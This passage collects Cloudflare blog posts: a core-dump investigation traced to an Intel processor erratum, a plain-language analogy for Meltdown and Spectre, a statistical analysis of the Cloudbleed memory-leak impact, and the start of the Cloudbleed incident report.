But that wasn’t the only consequence of the bug. Sometimes it could lead to an invalid memory read, causing the NGINX process to crash, and we had metrics showing these crashes in the weeks leading up to the discovery of Cloudbleed. So one of the measures we took to prevent such a problem happening again was to require that every crash be investigated in detail.

We acted very swiftly to address Cloudbleed, and so ended the crashes due to that bug, but that did not stop all crashes. We set to work investigating these other crashes.

Crash is not a technical term

But what exactly does “crash” mean in this context? When a processor detects an attempt to access invalid memory (more precisely, an address without a valid page in the page tables), it signals a page fault to the operating system’s kernel. In the case of Linux, these page faults result in the delivery of a SIGSEGV signal to the relevant process (the name SIGSEGV derives from the historical Unix term “segmentation violation”, also known as a segmentation fault or segfault). The default behaviour for SIGSEGV is to terminate the process. It’s this abrupt termination that was one symptom of the Cloudbleed bug.

This possibility of invalid memory access and the resulting termination is mostly relevant to processes written in C or C++. Higher-level compiled languages, such as Go and JVM-based languages, use type systems which prevent the kind of low-level programming errors that can lead to accesses of invalid memory. Furthermore, such languages have sophisticated runtimes that take advantage of page faults for implementation tricks that make them more efficient (a process can install a signal handler for SIGSEGV so that it does not get terminated, and instead can recover from the situation). And for interpreted languages such as Python, the interpreter checks that conditions leading to invalid memory accesses cannot occur. So unhandled SIGSEGV signals tend to be restricted to programming in C and C++.

SIGSEGV is not the only signal that indicates an error in a process and causes termination. We also saw process terminations due to SIGABRT and SIGILL, suggesting other kinds of bugs in our code.

If the only information we had about these terminated NGINX processes was the signal involved, investigating the causes would have been difficult. But there is another feature of Linux (and other Unix-derived operating systems) that provided a path forward: core dumps. A core dump is a file written by the operating system when a process is terminated abruptly. It records the full state of the process at the time it was terminated, allowing post-mortem debugging. The state recorded includes:

The processor register values for all threads in the process (the values of some program variables will be held in registers)
The contents of the process’ conventional memory regions (giving the values of other program variables and heap data)
Descriptions of regions of memory that are read-only mappings of files, such as executables and shared libraries
Information associated with the signal that caused termination, such as the address of an attempted memory access that led to a SIGSEGV

Because core dumps record all this state, their size depends upon the program involved, but they can be fairly large. Our NGINX core dumps are often several gigabytes.

Once a core dump has been recorded, it can be inspected using a debugging tool such as gdb. This allows the state from the core dump to be explored in terms of the original program source code, so that you can inquire about the program stack and contents of variables and the heap in a reasonably convenient manner.

A brief aside: Why are core dumps called core dumps? It’s a historical term that originated in the 1960s when the principal form of random access memory was magnetic core memory. At the time, the word core was used as a shorthand for memory, so “core dump” means a dump of the contents of memory.

CC BY-SA 3.0 image by Konstantin Lanzet

The game is afoot

As we examined the core dumps, we were able to track some of them back to more bugs in our code. None of them leaked data as Cloudbleed had, or had other security implications for our customers. Some might have allowed an attacker to try to impact our service, but the core dumps suggested that the bugs were being triggered under innocuous conditions rather than attacks. We didn’t have to fix many such bugs before the number of core dumps being produced had dropped significantly.

But there were still some core dumps being produced on our servers — about one a day across our whole fleet of servers. And finding the root cause of these remaining ones proved more difficult.

We gradually began to suspect that these residual core dumps were not due to bugs in our code. These suspicions arose because we found cases where the state recorded in the core dump did not seem to be possible based on the program code (and in examining these cases, we didn’t rely on the C code, but looked at the machine code produced by the compiler, in case we were dealing with compiler bugs). At first, as we discussed these core dumps among the engineers at Cloudflare, there was some healthy scepticism about the idea that the cause might lie outside of our code, and there was at least one joke about cosmic rays. But as we amassed more and more examples, it became clear that something unusual was going on. Finding yet another “mystery core dump”, as we had taken to calling them, became routine, although the details of these core dumps were diverse, and the code triggering them was spread throughout our code base. The common feature was their apparent impossibility.

There was no obvious pattern to the servers which produced these mystery core dumps. We were getting about one a day on average across our fleet of servers. So the sample size was not very big, but they seemed to be evenly spread across all our servers and datacenters, and no one server was struck twice. The probability that an individual server would get a mystery core dump seemed to be very low (about one per ten years of server uptime, assuming they were indeed equally likely for all our servers). But because of our large number of servers, we got a steady trickle.

In quest of a solution

The rate of mystery core dumps was low enough that it didn’t appreciably impact the service to our customers. But we were still committed to examining every core dump that occurred. Although we got better at recognizing these mystery core dumps, investigating and classifying them was a drain on engineering resources. We wanted to find the root cause and fix it. So we started to consider causes that seemed somewhat plausible:

We looked at hardware problems. Memory errors in particular are a real possibility. But our servers use ECC (Error-Correcting Code) memory which can detect, and in most cases correct, any memory errors that do occur. Furthermore, any memory errors should be recorded in the IPMI logs of the servers. We do see some memory errors on our server fleet, but they were not correlated with the core dumps.

If not memory errors, then could there be a problem with the processor hardware? We mostly use Intel Xeon processors, of various models. These have a good reputation for reliability, and while the rate of core dumps was low, it seemed like it might be too high to be attributed to processor errors. We searched for reports of similar issues, and asked on the grapevine, but didn’t hear about anything that seemed to match our issue.

While we were investigating, an issue with Intel Skylake processors came to light. But at that time we did not have Skylake-based servers in production, and furthermore that issue related to particular code patterns that were not a common feature of our mystery core dumps.

Maybe the core dumps were being incorrectly recorded by the Linux kernel, so that a mundane crash due to a bug in our code ended up looking mysterious? But we didn’t see any patterns in the core dumps that pointed to something like this. Also, upon an unhandled SIGSEGV, the kernel generates a log line with a small amount of information about the cause, like this:

segfault at ffffffff810c644a ip 00005600af22884a sp 00007ffd771b9550 error 15 in nginx-fl[5600aeed2000+e09000]

We checked these log lines against the core dumps, and they were always consistent.

The kernel has a role in controlling the processor’s Memory Management Unit to provide virtual memory to application programs. So kernel bugs in that area can lead to surprising results (and we have encountered such a bug at Cloudflare in a different context). But we examined the kernel code, and searched for reports of relevant bugs against Linux, without finding anything.

For several weeks, our efforts to find the cause were not fruitful. Due to the very low frequency of the mystery core dumps when considered on a per-server basis, we couldn’t follow the usual last-resort approach to problem solving - changing various possible causative factors in the hope that they make the problem more or less likely to occur. We needed another lead.

The solution

But eventually, we noticed something crucial that we had missed until that point: all of the mystery core dumps came from servers containing The Intel Xeon E5-2650 v4. This model belongs to the generation of Intel processors that had the codename “Broadwell”, and it’s the only model of that generation that we use in our edge servers, so we simply call these servers Broadwells. The Broadwells made up about a third of our fleet at that time, and they were in many of our datacenters. This explains why the pattern was not immediately obvious.

This insight immediately threw the focus of our investigation back onto the possibility of processor hardware issues. We downloaded Intel’s Specification Update for this model. In these Specification Update documents Intel discloses all the ways that its processors deviate from their published specifications, whether due to benign discrepancies or bugs in the hardware (Intel entertainingly calls these “errata”).

The Specification Update described 85 issues, most of which are obscure issues of interest mainly to the developers of the BIOS and operating systems. But one caught our eye: “BDF76 An Intel® Hyper-Threading Technology Enabled Processor May Exhibit Internal Parity Errors or Unpredictable System Behavior”. The symptoms described for this issue are very broad (“unpredictable system behavior may occur”), but what we were observing seemed to match the description of this issue better than any other.

Furthermore, the Specification Update stated that BDF76 was fixed in a microcode update. Microcode is firmware that controls the lowest-level operation of the processor, and can be updated by the BIOS (from system vendor) or the OS. Microcode updates can change the behaviour of the processor to some extent (exactly how much is a closely-guarded secret of Intel, although the recent microcode updates to address the Spectre vulnerability give some idea of the impressive degree to which Intel can reconfigure the processor’s behaviour).

The most convenient way for us to apply the microcode update to our Broadwell servers at that time was via a BIOS update from the server vendor. But rolling out a BIOS update to so many servers in so many data centers takes some planning and time to conduct. Due to the low rate of mystery core dumps, we would not know if BDF76 was really the root cause of our problems until a significant fraction of our Broadwell servers had been updated. A couple of weeks of keen anticipation followed while we awaited the outcome.

To our great relief, once the update was completed, the mystery core dumps stopped. This chart shows the number of core dumps we were getting each day for the relevant months of 2017:

As you can see, after the microcode update there is a marked reduction in the rate of core dumps. But we still get some core dumps. These are not mysteries, but represent conventional issues in our software. We continue to investigate and fix them to ensure they don’t represent security issues in our service.

The conclusion

Eliminating the mystery core dumps has made it easier to focus on any remaining crashes that are due to our code. It removes the temptation to dismiss a core dump because its cause is obscure.

And for some of the core dumps that we see now, understanding the cause can be very challenging. They correspond to very unlikely conditions, and often involve a root cause that is distant from the immediate issue that triggered the core dump. For example, we see segfaults in LuaJIT (which we embed in NGINX via OpenResty) that are not due to problems in LuaJIT, but rather because LuaJIT is particularly susceptible to damage to its data structures by bugs in unrelated C code.

Excited by core dump detective work? Or building systems at a scale where once-in-a-decade problems can get triggered every day? Then join our team.

An Explanation of the Meltdown/Spectre Bugs for a Non-Technical Audience

John Graham-Cumming — Mon, 08 Jan 2018 18:57:00 GMT

Last week the news of two significant computer bugs was announced. They've been dubbed Meltdown and Spectre. These bugs take advantage of very technical systems that modern CPUs have implemented to make computers extremely fast. Even highly technical people can find it difficult to wrap their heads around how these bugs work. But, using some analogies, it's possible to understand exactly what's going on with these bugs. If you've found yourself puzzled by exactly what's going on with these bugs, read on — this blog is for you.

“When you come to a fork in the road, take it.” — Yogi Berra

Late one afternoon walking through a forest near your home and navigating with the GPS you come to a fork in the path which you’ve taken many times before. Unfortunately, for some mysterious reason your GPS is not working and being a methodical person you like to follow it very carefully.

Cooling your heels waiting for GPS to start working again is annoying because you are losing time when you could be getting home. Instead of waiting, you decide to make an intelligent guess about which path is most likely based on past experience and set off down right hand path.

After walking for a short distance the GPS comes to life and tells you which is the correct path. If you predicted correctly then you’ve saved a significant amount of time. If not, then you hop over to the other path and carry on that way.

Something just like this happens inside the CPU in pretty much every computer. Fundamental to the very essence and operation of a computer is the ability to branch, to choose between two different code paths. As you read this, your web browser is making branch decisions continuously (for example, some part of it is waiting for you to click a link to go to some other page).

One way that CPUs have reached incredible speeds is the ability to predict which of two branches is most likely and start executing it before it knows whether that’s the correct path to take.

For example, the code that checks for you clicking this link might be a little slow because it’s waiting for mouse movements and button clicks. Rather than wait the CPU will start automatically executing the branch it thinks is most likely (probably that you don’t click the link). Once the check actually indicates “clicked” or “not clicked” the CPU will either continue down the branch it took, or abandon the code it has executed and restart at the ‘fork in the path’.

This is known as “branch prediction” and saves a great deal of idling processor time. It relies on the ability of the CPU to run code “speculatively” and throw away results if that code should not have been run in the first place.

Every time you’ve taken the right hand path in the past it’s been correct, but today it isn’t. Today it’s winter and the foliage is sparser and you’ll see something you shouldn’t down that path: a secret government base hiding alien technology.

But wanting to get home fast you take the path anyway not realizing that the GPS is going to indicate that left hand path today and keep you out of danger. Before the GPS comes back to life you catch a glimpse of an alien through the trees.

Moments later two Men In Black appear, erase your memory and dump you back at the fork in the path. Shortly after, the GPS beeps and you set off down the left hand path none the wiser.

Something similar to this happens in the Spectre/Meltdown attack. The CPU starts executing a branch of code that it has previously learnt is typically the right code to run. But it’s been tricked by a clever attacker and this time it’s the wrong branch. Worse, the code will access memory that it shouldn’t (perhaps from another program) giving it access to otherwise secret information (such as passwords).

When the CPU realizes it’s gone the wrong way it forgets all the erroneous work it’s done (and the fact that it accessed memory it shouldn’t have) and executes the correct branch instead. Even though illegal memory was accessed what it contained has been forgotten by the CPU.

The core of Meltdown and Spectre is the ability to exfiltrate information, from this speculatively executed code, concerning the illegally accessed memory through what’s known as a “side channel”.

You’d actually heard rumours of Men In Black and want to find some way of letting yourself know whether you saw aliens or not. Since there’s a short space between you seeing aliens and your memory being erased you come up with a plan.

If you see aliens then you gulp down an energy drink that you have in your backpack. Once deposited back at the fork by the Men In Black you can discover whether you drank the energy drink (and therefore whether you saw aliens) by walking 500 metres and timing yourself. You’ll go faster with the extra carbs in a can of Reactor Core.

Computers have also reached high speeds by keeping a copy of frequently or recently accessed information inside the CPU itself. The closer data is to the CPU the faster it can be used.

This store of recently/frequently used data inside the CPU is called a “cache”. Both branch prediction and the cache mean that CPUs are blazingly fast. Sadly, they can also be combined to create the security problems that have recently been reported with Intel and other CPUs.

In the Meltdown/Spectre attacks, the attacker determines what secret information (the real world equivalent of the aliens) was accessed using timing information (but not an energy drink!). In the split second after accessing illegal memory, and before the code being run is forgotten by the CPU, the attacker’s code loads a single byte into the CPU cache. A single byte which it has perfectly legal access to; something from its own program memory!

The attacker can then determine what happened in the branch just by trying to read the same byte: if it takes a long time to read then it wasn’t in cache, if it doesn’t take long then it was. The difference in timing is all the attacker needs to know what occurred in the branch the CPU should never have executed.

To turn this into an exploit that actually reads illegal memory is easy. Just repeat this process over and over again once per single bit of illegal memory that you are reading. Each single bit’s 1 or 0 can be translated into the presence or absence of an item in the CPU cache which is ‘read’ using the timing trick above.

Although that might seem like a laborious process, it is, in fact, something that can be done very quickly enabling the dumping of the entire memory of a computer. In the real world it would be impractical to hike down the path and get zapped by the Men In Black in order to leak details of the aliens (their color, size, language, etc.), but in a computer it’s feasible to redo the branch over and over again because of the inherent speed (100s of millions of branches per second!).

And if an attacker can dump the memory of a computer it has access to the crown jewels: what’s in memory at any moment is likely to be very, very sensitive: passwords, cryptographic secrets, the email you are writing, a private chat and more.

Conclusion

I hope that this helps you understand the essence of Meltdown and Spectre. There are many variations of both attacks that all rely on the same ideas: get the CPU to speculatively run some code (through branch prediction or another technique) that illegally accesses memory and extract information using a timing side channel through the CPU cache.

If you care to read all the gory detail there’s a paper on Meltdown and a separate one on Spectre.

Acknowledgements: I’m grateful to all the people who read this and gave me feedback (including gently telling me the ways in which I didn’t understand branch prediction and speculative execution). Thank you especially to David Wragg, Kenton Varda, Chris Branch, Vlad Krasnov, Matthew Prince, Michelle Zatlyn and Ben Cartwright-Cox. And huge thanks for Kari Linder for the illustrations.

Quantifying the Impact of "Cloudbleed"

Matthew Prince — Wed, 01 Mar 2017 15:27:00 GMT

Last Thursday we released details on a bug in Cloudflare's parser impacting our customers. It was an extremely serious bug that caused data flowing through Cloudflare's network to be leaked onto the Internet. We fully patched the bug within hours of being notified. However, given the scale of Cloudflare, the impact was potentially massive.

The bug has been dubbed “Cloudbleed.” Because of its potential impact, the bug has been written about extensively and generated a lot of uncertainty. The burden of that uncertainty has been felt by our partners, customers, and our customers’ customers. The question we’ve been asked the most often is: what risk does Cloudbleed pose to me?

We've spent the last twelve days using log data on the actual requests we’ve seen across our network to get a better grip on what the impact was and, in turn, provide an estimate of the risk to our customers. This post outlines our initial findings.

The summary is that, while the bug was very bad and had the potential to be much worse, based on our analysis so far: 1) we have found no evidence based on our logs that the bug was maliciously exploited before it was patched; 2) the vast majority of Cloudflare customers had no data leaked; 3) after a review of tens of thousands of pages of leaked data from search engine caches, we have found a large number of instances of leaked internal Cloudflare headers and customer cookies, but we have not found any instances of passwords, credit card numbers, or health records; and 4) our review is ongoing.

To make sense of the analysis, it's important to understand exactly how the bug was triggered and when data was exposed. If you feel like you've already got a good handle on how the bug got triggered, click here to skip to the analysis.

Triggering the Bug

One of Cloudflare's core applications is a stream parser. The parser scans content as it is delivered from Cloudflare's network and is able to modify it in real time. The parser is used to enable functions like automatically rewriting links from HTTP to HTTPS (Automatic HTTPS Rewrites), hiding email addresses on pages from email harvesters (Email Address Obfuscation), and other similar features.

The Cloudbleed bug was triggered when a page with two characteristics was requested through Cloudflare's network. The two characteristics were: 1) the HTML on the page needed to be broken in a specific way; and 2) a particular set of Cloudflare features needed to be turned on for the page in question.

The specific HTML flaw was that the page had to end with an unterminated attribute. In other words, something like:


            Here's why that mattered. When a page for a particular customer is being parsed it is stored in memory on one of the servers that is a part of our infrastructure. Contents of the other customers' requests are also in adjacent portions of memory on Cloudflare's servers.
The bug caused the parser, when it encountered unterminated attribute at the end of a page, to not stop when it reached the end of the portion of memory for the particular page being parsed. Instead, the parser continued to read from adjacent memory, which contained data from other customers' requests. The contents of that adjacent memory was then dumped onto the page with the flawed HTML.
            
            
            
            
            
The screenshot above is an example of how data was dumped on pages. Most of the data was random binary data which the browser is trying to interpret as largely Asian characters. That is followed by a number of internal Cloudflare headers.
If you had accessed one of the pages that triggered the bug you would have seen what likely looked like random text at the end of the page. The amount of data dumped was of random lengths limited to the size of the heap or when the parser happened across a character that caused the output to terminate.
    
      Code Path and a New Parser
      
        
      
    
    In addition to a page with flawed HTML, the particular set of Cloudflare features that were enabled mattered because it determined the version of the parser that was used. We rolled out a new version of the parser code on 22 September 2016. This new version of the parser exposed the bug.
Initially, the new parser code would only get executed under a very limited set of circumstances. Fewer than 180 sites from 22 September 2016 through 13 February 2017 had the combination of the HTML flaw and the set of features that would trigger the new version of the parser. During that time period, pages that had both characteristics and therefore would trigger the bug were accessed an estimated 605,037 times.
On 13 February 2017, not aware of the bug, we expanded the circumstances under which the new parser would get executed. That expanded the number of sites where the bug could get triggered from fewer than 180 to 6,457. From 13 February 2017 through 18 February 2017, when we patched the bug, the pages that would trigger the bug were accessed an estimated 637,034 times. In total, between 22 September 2016 and 18 February 2017 we now estimate based on our logs the bug was triggered 1,242,071 times.
The pages that typically triggered the bug tended to be on small and infrequently accessed sites. When one of these vulnerable pages was accessed and the bug was triggered, it was random what other customers would have content in memory adjacent that would then get leaked. Higher traffic Cloudflare customers would be more probable to have some data in memory because they received more requests and so, probabilistically, they're more likely to have their content in memory at any given time.
To be clear, customers that had data leak did not need to have flawed HTML or any particular Cloudflare features enabled. They just needed to be unlucky and have their data in memory immediately following a page that triggered the bug.
    
      How a Malicious Actor Would Exploit the Bug
      
        
      
    
    The Cloudbleed bug wasn't like a typical data breach. To analogize to the physical world, a typical data breach would be like a robber breaking into your office and stealing all your file cabinets. The bad news in that case is that the robber has all your files. The good news is you know exactly what they have.
Cloudbleed is different. It's more akin to learning that a stranger may have listened in on two employees at your company talking over lunch. The good news is the amount of information for any conversation that's eavesdropped is limited. The bad news is you can't know exactly what the stranger may have heard, including potentially sensitive information about your company.
If a stranger were listening in on a conversation between two employees, the vast majority of what they would hear wouldn't be harmful. But, every once in awhile, the stranger may overhear something confidential. The same is true if a malicious attacker knew about the bug and were trying to exploit it. Given that the data that leaked was random on a per request basis, most requests would return nothing interesting. But, every once in awhile, the data that leaked may return something of interest to a hacker.
If a hacker were aware of the bug before it was patched and trying to exploit it then the best way for them to do so would be to send as many requests as possible to a page that contained the set of conditions that would trigger the bug. They could then record the results. Most of what they would get would be useless, but some would contain very sensitive information.
The nightmare scenario we have been worried about is if a hacker had been aware of the bug and had been quietly mining data before we were notified by Google's Project Zero team and were able to patch it. For the last twelve days we've been reviewing our logs to see if there's any evidence to indicate that a hacker was exploiting the bug before it was patched. We’ve found nothing so far to indicate that was the case.
    
      Identifying Patterns of Malicious Behavior
      
        
      
    
    For a limited period of time we keep a debugging log of requests that pass through Cloudflare. This is done by sampling 1% of requests and storing information about the request and response. We are then able to look back in time for anomalies in HTTP response codes, response or request body sizes, response times, or other unusual behavior from specific networks or IP addresses.
We have the logs of 1% of all requests going through Cloudflare from 8 February 2017 up to 18 February 2017 (when the vulnerability was patched) giving us the ability to look for requests leaking data during this time period. Requests prior to 8 February 2017 had already been deleted. Because we have a representative sample of the logs for the 6,457 vulnerable sites, we were able to parse them in order to look for any evidence someone was exploiting the bug.
The first thing we looked for was a site we knew was vulnerable and for which we had accurate data. In the early hours of 18 February 2017, immediately after the problem was reported to us, we set up a vulnerable page on a test site and used it to reproduce the bug and then verify it had been fixed.
Because we had logging on the test web server itself we were able to quickly verify that we had the right data. The test web server had received 31,874 hits on the vulnerable page due to our testing. We had captured very close to 1% of those requests (316 were stored). From the sampled data, we were also able to look at the sizes of responses which showed a clear bimodal distribution. Small responses were from when the bug was fixed, large responses from when the leak was apparent.
This gave us confidence that we had captured the right information to go hunting for exploitation of the vulnerability.
We wanted to answer two questions:
Did any individual IP hit a vulnerable page enough times that a meaningful amount of data was extracted? This would capture the situation where someone had discovered the problem on a web page and had set up a process to repeatedly download the page from their machine. For example, something as simple as running curl in a loop would show up in this analysis.
Was any vulnerable page accessed enough times that a meaningful amount of data could have been extracted by a botnet? A more advanced hacker would have wanted to cover their footprints by using a wide range of IP addresses rather than repeatedly visiting a page from a single IP. To identify that possibility we wanted to see if any individual page had been accessed enough times and returned enough data for us to suspect that data was being extracted.
    
      Reviewing the Logs
      
        
      
    
    To answer #1, we looked for any IP addresses that had hit a single page on a vulnerable site more than 1,000 times and downloaded more data than the site would normally deliver. We found 7 IP addresses with those characteristics.
Six of the seven IP addresses were accessing three sites with three pages with very large HTML. Manual inspection showed that these pages did not contain the broken HTML that would have triggered the bug. They also did not appear in a database of potentially vulnerable pages that our team gathered after the bug was patched.
The other IP address belonged to a mobile network and was traffic for a ticket booking application. The particular page was very large even though it was not leaking data, however, it did not contain broken HTML, and was not in our database of vulnerable pages.
To look for evidence of #2, we retrieved every page on a vulnerable site that was requested more than 1,000 times during the period. We then downloaded those pages and ran them through the vulnerable version of our software in a test environment to see if any of them would cause a leak. This search turned up the sites we had created to test the vulnerability. However, we found no vulnerable pages, outside of our own test sites, that had been accessed more than 1,000 times.
This leads us to believe that the vulnerability had not been exploited between 8 February 2017 and 18 February 2017. However, we also wanted to look for signs of exploitation between 22 September 2016 and 8 February 2017 — a time period for which we did not have sampled log data. To do that, we turned to our customer analytics database.
    
      Reviewing Customer Analytics
      
        
      
    
    We store customer analytics data with one hour granularity in a large datastore. For every site on Cloudflare and for each hour we have the total number of requests to the site, number of bytes read from the origin web server, number of bytes sent to client web browsers, and the number of unique IP addresses accessing the site.
If a malicious attacker were sending a large number of requests to exploit the bug then we hypothesized that a number of signals would potentially appear in our logs. These include:
The ratio of requests per unique IP would increase. While an attacker could use a botnet or large number of machines to harvest data, we speculated that, at least initially, upon discovering the bug the hacker would send a large number of requests from a small set of IPs to gather initial data.
* The ratio of bandwidth per request would increase. Since the bug leaks a large amount of data onto the page, if the bug were being exploited then the bandwidth per request would increase.
* The ratio of bandwidth per unique IP would also increase. Since you’d expect that more data was going to the smaller set of IPs the attacker would use to pull down data then the bandwidth per IP would increase.
We used the data from before the bug impacted sites to set the baseline for each site for each of these three ratios. We then tracked the ratios above across each site individually during the period for which it was vulnerable and looked for anomalies that may suggest a hacker was exploiting the vulnerability ahead of its public disclosure.
This data is much more noisy than the sampled log data because it is rolled up and averaged over one hour windows. However, we have not seen any evidence of exploitation of this bug from this data.
    
      Reviewing Crash Data
      
        
      
    
    Lastly, when the bug was triggered it would, depending on what was read from memory, sometimes cause our parser application to crash. We have technical operations logs that record every time an application running on our network crashes. These logs cover the entire period of time the bug was in production (22 September 2016 – 18 February 2017).
We ran a suite of known-vulnerable HTML through our test platform to establish the percentage of time that we would expect the application to crash.
We reviewed our application crash logs for the entire period the bug was in production. We did turn up periodic instances of the parser crashing that align with the frequency of how often we estimate the bug was triggered. However, we did not see a signal in the crash data that would indicate that the bug was being actively exploited at any point during the period it was present in our system.
    
      Purging Search Engine Caches
      
        
      
    
    Even if an attacker wasn’t actively exploiting the bug prior to our patching it, there was still potential harm because private data leaked and was cached by various automated crawlers. Because the 6,457 sites that could trigger the bug were generally small, the largest percentage of their traffic comes from search engine crawlers. Of the 1,242,071 requests that triggered the bug, we estimate more than half came from search engine crawlers.
Cloudflare has spent the last 12 days working with various search engines — including Google, Bing, Yahoo, Baidu, Yandex, DuckDuckGo, and others — to clear their caches. We were able to remove the majority of the cached pages before the disclosure of the bug last Thursday.
Since then, we’ve worked with major search engines as well as other online archives to purge cached data. We’ve successfully removed more than 80,000 unique cached pages. That underestimates the total number because we’ve requested search engines purge and recrawl entire sites in some instances. Cloudflare customers who discover leaked data still online can report it by sending a link to the cache to parserbug@cloudflare.com and our team will work to have it purged.
    
      Analysis of What Data Leaked
      
        
      
    
    The search engine caches provide us an opportunity to analyze what data leaked. While many have speculated that any data passing through Cloudflare may have been exposed, the way that data is structured in memory and the frequency of GET versus POST requests makes certain data more or less likely to be exposed. We analyzed a representative sample of the cached pages retrieved from search engine caches and ran a thorough analysis on each of them. The sample included thousands of pages and was statistically significant to a confidence level of 99% with a margin of error of 2.5%. Within that sample we would expect the following data types to appear this many times in any given leak:
              67.54 Internal Cloudflare Headers
   0.44 Cookies
   0.04 Authorization Headers / Tokens
      0 Passwords
      0 Credit Cards / Bitcoin Addresses
      0 Health Records
      0 Social Security Numbers
      0 Customer Encryption Keys
            The above can be read to mean that in any given leak you would expect to find 67.54 Cloudflare internal headers. You’d expect to find a cookie in approximately half of all leaks (0.44 cookies per leak). We did not find any passwords, credit cards, health records, social security numbers, or customer encryption keys in the sample set.
Since this is just a sample, it is not correct to conclude that no passwords, credit cards, health records, social security numbers, or customer encryption keys were ever exposed. However, if there was any exposure, based on the data we’ve reviewed, it does not appear to have been widespread. We have also not had any confirmed reports of third parties discovering any of these sensitive data types on any cached pages.
These findings generally make sense given what we know about traffic to Cloudflare sites. Based on our logs, the ratio of GET to POST requests across our network is approximately 100-to-1. Since POSTs are more likely to contain sensitive data like passwords, we estimate that reduces the potential exposure of the most sensitive data from 1,242,071 requests to closer to 12,420. POSTs that contain particularly sensitive information would then represent only a fraction of the 12,420 we would expect to have leaked.
This is not to downplay the seriousness of the bug. For instance, depending on how a Cloudflare customer’s systems are implemented, cookie data, which would be present in GET requests, could be used to impersonate another user’s session. We’ve seen approximately 150 Cloudflare customers’ data in the more than 80,000 cached pages we’ve purged from search engine caches. When data for a customer is present, we’ve reached out to the customer proactively to share the data that we’ve discovered and help them work to mitigate any impact. Generally, if customer data was exposed, invalidating session cookies and rolling any internal authorization tokens is the best advice to mitigate the largest potential risk based on our investigation so far.
    
      How to Understand Your Risk
      
        
      
    
    We have tried to quantify the risk to individual customers that their data may have leaked. Generally, the more requests that a customer sent to Cloudflare, the more likely it is that their data would have been in memory and therefore exposed. This is anecdotally confirmed by the 150 customers whose data we’ve found in third party caches. The customers whose data appeared in caches are typically the customers that send the most requests through Cloudflare’s network.
Probabilistically, we are able to estimate the likelihood of data leaking for a particular customer based on the number of requests per month (RPM) that they send through our network since the more requests sent through our network the more likely a customer’s data is to be in memory when the bug was triggered. Below is a chart of the number of total anticipated data leak events from 22 September 2016 – 18 February 2017 that we would expect based on the average number of requests per month a customer sends through Cloudflare’s network:
             Requests per Month       Anticipated Leaks
 ------------------       -----------------
        200B – 300B         22,356 – 33,534
        100B – 200B         11,427 – 22,356
         50B – 100B          5,962 – 11,427
          10B – 50B           1,118 – 5,926
           1B – 10B             112 – 1,118
          500M – 1B                56 – 112
        250M – 500M                 25 – 56
        100M – 250M                 11 – 25
         50M – 100M                  6 – 11
          10M – 50M                   1 – 6
              < 10M                     < 1
            More than 99% of Cloudflare’s customers send fewer than 10 million requests per month. At that level, probabilistically we would expect that they would have no data leaked during the period the bug was present. For further context, the 100th largest website in the world is estimated to handle fewer than 10 billion requests per month, so there are very few of Cloudflare’s 6 million customers that fall into the top bands of the chart above. Cloudflare customers can find their own RPM by logging into the Cloudflare Analytics Dashboard and looking at the number of requests per month for their sites.
The statistics above assume that each leak contained only one customer’s data. That was true for nearly all of the leaks we reviewed from search engine caches. However, there were instances where more data may have been leaked. The probability table above should be considered just an estimate to help provide some general guidance on the likelihood a customer’s data would have leaked.
    
      Interim Conclusion
      
        
      
    
    We are continuing to work with third party caches to expunge leaked data and will not let up until every bit has been removed. We also continue to analyze Cloudflare’s logs and the particular requests that triggered the bug for anomalies. While we were able to mitigate this bug within minutes of it being reported to us, we want to ensure that other bugs are not present in the code. We have undertaken a full review of the parser code to look for any additional potential vulnerabilities. In addition to our own review, we're working with the outside code auditing firm Veracode to review our code.
Cloudflare’s mission is to help build a better Internet. Everyone on our team comes to work every day to help our customers — regardless of whether they are businesses, non-profits, governments, or hobbyists — run their corner of the Internet a little better. This bug exposed just how much of the Internet puts its trust in us. We know we disappointed you and we apologize. We will continue to share what we discover because we believe trust is critical and transparency is the foundation of that trust.



Incident report on memory leak caused by Cloudflare parser bug
John Graham-Cumming — Thu, 23 Feb 2017 23:01:06 GMT
 Last Friday, Tavis Ormandy from Google’s Project Zero contacted Cloudflare to report a security problem with our edge servers. He was seeing corrupted web pages being returned by some HTTP requests run through Cloudflare.
It turned out that in some unusual circumstances, which I’ll detail below, our edge servers were running past the end of a buffer and returning memory that contained private information such as HTTP cookies, authentication tokens, HTTP POST bodies, and other sensitive data. And some of that data had been cached by search engines.
For the avoidance of doubt, Cloudflare customer SSL private keys were not leaked. Cloudflare has always terminated SSL connections through an isolated instance of NGINX that was not affected by this bug.
We quickly identified the problem and turned off three minor Cloudflare features (email obfuscation, Server-side Excludes and Automatic HTTPS Rewrites) that were all using the same HTML parser chain that was causing the leakage. At that point it was no longer possible for memory to be returned in an HTTP response.
Because of the seriousness of such a bug, a cross-functional team from software engineering, infosec and operations formed in San Francisco and London to fully understand the underlying cause, to understand the effect of the memory leakage, and to work with Google and other search engines to remove any cached HTTP responses.
Having a global team meant that, at 12 hour intervals, work was handed over between offices enabling staff to work on the problem 24 hours a day. The team has worked continuously to ensure that this bug and its consequences are fully dealt with. One of the advantages of being a service is that bugs can go from reported to fixed in minutes to hours instead of months. The industry standard time allowed to deploy a fix for a bug like this is usually three months; we were completely finished globally in under 7 hours with an initial mitigation in 47 minutes.
The bug was serious because the leaked memory could contain private information and because it had been cached by search engines. We have also not discovered any evidence of malicious exploits of the bug or other reports of its existence.
The greatest period of impact was from February 13 and February 18 with around 1 in every 3,300,000 HTTP requests through Cloudflare potentially resulting in memory leakage (that’s about 0.00003% of requests).
We are grateful that it was found by one of the world’s top security research teams and reported to us.
This blog post is rather long but, as is our tradition, we prefer to be open and technically detailed about problems that occur with our service.
    
      Parsing and modifying HTML on the fly
      
        
      
    
    Many of Cloudflare’s services rely on parsing and modifying HTML pages as they pass through our edge servers. For example, we can insert the Google Analytics tag, safely rewrite http:// links to https://, exclude parts of a page from bad bots, obfuscate email addresses, enable AMP, and more by modifying the HTML of a page.
To modify the page, we need to read and parse the HTML to find elements that need changing. Since the very early days of Cloudflare, we’ve used a parser written using Ragel. A single .rl file contains an HTML parser used for all the on-the-fly HTML modifications that Cloudflare performs.
About a year ago we decided that the Ragel-based parser had become too complex to maintain and we started to write a new parser, named cf-html, to replace it. This streaming parser works correctly with HTML5 and is much, much faster and easier to maintain.
We first used this new parser for the Automatic HTTP Rewrites feature and have been slowly migrating functionality that uses the old Ragel parser to cf-html.
Both cf-html and the old Ragel parser are implemented as NGINX modules compiled into our NGINX builds. These NGINX filter modules parse buffers (blocks of memory) containing HTML responses, make modifications as necessary, and pass the buffers onto the next filter.
For the avoidance of doubt: the bug is not in Ragel itself. It is in Cloudflare's use of Ragel. This is our bug and not the fault of Ragel.
